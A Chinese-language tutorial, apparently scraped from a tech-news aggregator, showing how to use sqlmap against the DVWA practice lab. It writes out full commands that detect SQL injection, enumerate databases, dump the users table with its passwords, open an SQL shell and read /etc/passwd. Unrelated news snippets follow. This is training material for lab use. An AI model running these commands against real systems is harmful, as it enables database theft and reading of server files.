项目地址 https://github.com/sqlmapproject/sqlmap 下载即可使用,需要安装 <em>python</em> 一些基础用法 这里使用常用漏洞靶场 dvwa 作为演示 检测是否存在注入 sqlmap -u "http://192.168.0.9/vulnerabilities/sql
2021-05-31 22:30:06
sqlmap 是一種開源滲透測試工具,可自動執行檢測和利用 SQL 注入缺陷以及接管資料庫伺服器的過程。它配備了強大的檢測引擎、許多適用於最終滲透測試人員的利基功能,以及廣泛的開關,包括資料庫指紋、從資料庫獲取資料、訪問底層檔案系統以及通過輸出在作業系統上執行命令。
項目地址 https://github.com/sqlmapproject/sqlmap
下載即可使用,需要安裝 python
一些基礎用法
這裡使用常用漏洞靶場 dvwa 作為演示
檢測是否存在注入
sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#"
-u 指定要檢測的 url,sqlmap 就會自動檢測嘗試可注入的參數也可以新增 -p 指定參數,這裡為 -p "id"完整命令為
sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id"
由於 dvwa 需要登入,所以還需要指定 cookie,需要新增 --cookie
sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low"
執行,提示 id 存在 sql 注入,並顯示了注入的 payload。
獲取資料庫資訊
上一步得出存在注入,那麼便可以更進一步,獲取更多資訊了。比如獲取該網站當前使用的資料庫名,使用如下命令。
sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --batch --current-db
--batch 表示預設全部確定,這樣就不會出現確認提示--current-db 表示獲取當前資料庫名可以看到很快就獲取到了,當前資料庫名為 dvwa
繼續列出所有資料庫。
sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --batch --dbs
--dbs 列出所有資料庫一共有兩個資料庫。
獲取表以及表中的資料
獲取到資料庫資訊之後,進一步獲取資料表資訊,以及資料。
列舉指定資料庫中所有的表。
sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --batch -D "dvwa" --tables
-D 指定資料庫,後接資料庫名--tables 列出所有表一共獲取到兩張表。
列舉指定表的所有資料。
sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --batch -D "dvwa" -T "users" --dump
獲取到 users 表的資料,並且 sqlmap 幫我們自動解密了密碼。
執行 sql 語句以及讀取檔案
我們也可以執行一些自定義的 sql 語句。
sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --sql-shell
上面語句執行後,將會開啟一個 sql shell,供我們執行 sql 命令。
還可以直接讀取檔案,例如讀取 /etc/passwd。
sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --batch --file-read "/etc/passwd"
--file-read 表示讀取檔案,參數為檔案絕對路徑顯示檔案讀取成功,被儲存到本地。
開啟該檔案即可看到讀取下來的內容。
以上就是 sql 常見用法了。
相關文章
项目地址 https://github.com/sqlmapproject/sqlmap 下载即可使用,需要安装 <em>python</em> 一些基础用法 这里使用常用漏洞靶场 dvwa 作为演示 检测是否存在注入 sqlmap -u "http://192.168.0.9/vulnerabilities/sql
2021-05-31 22:30:06
<em>英特尔</em>首席执行官帕特·吉尔辛格表示,全球半导体短缺问题可能需要数年时间才能得到解决。目前,该问题已导致一些汽车生产线关闭,包括消费电子产品在内的其他领域也受到了影响。 军工板块普涨,航亚科技涨停,
2021-05-31 22:03:12
笔记本电脑:联想拯救者R7000P 2020款 显卡:NVIDIA GeForce RTX 2060(6GB)处理器:AMD Ryzen7 4800H 内存:16GB 目标群体:电脑小白,需要能快速上手评测游戏性能 二、软件下载与安装 MSI Afterburner的下载很简单,在任意<em>浏览
2021-05-31 22:02:35
1、沧州华为云服务器集群构建 IPFS分布式存储技术 2、世界第二大<em>浏览器</em> Firefox支持 IPFS 3、EOS是利用 IPFS协议进行文件存储的 4、比特现金发布基于IPFS双向支付 5、微软构建了一个基于 IPFS的身份验证系
2021-05-31 22:02:24
微软宣布,2022年6月15号开始,停止IE服务,微软将删除个人版 Win10 中的IE<em>浏览器</em>。此外,微软 Office 365 将于 2021 年 8 月 17 日后停止支持 IE 11 <em>浏览器</em>。从1995年IE的1.0版本到IE11,到明年之后的退出
2021-05-31 22:02:19
顾虑一:针对具体芯片定制的鸿蒙母版系统什么时候能来?目前OV旗下、小米以及魅族、中兴等手机,都采用<em>安卓</em>系统,并在<em>安卓</em>开源的AOSP基础上,适配了各自的 UI级系统。参考<em>安卓</em>发布的通常流程:芯片组
2021-05-31 22:01:39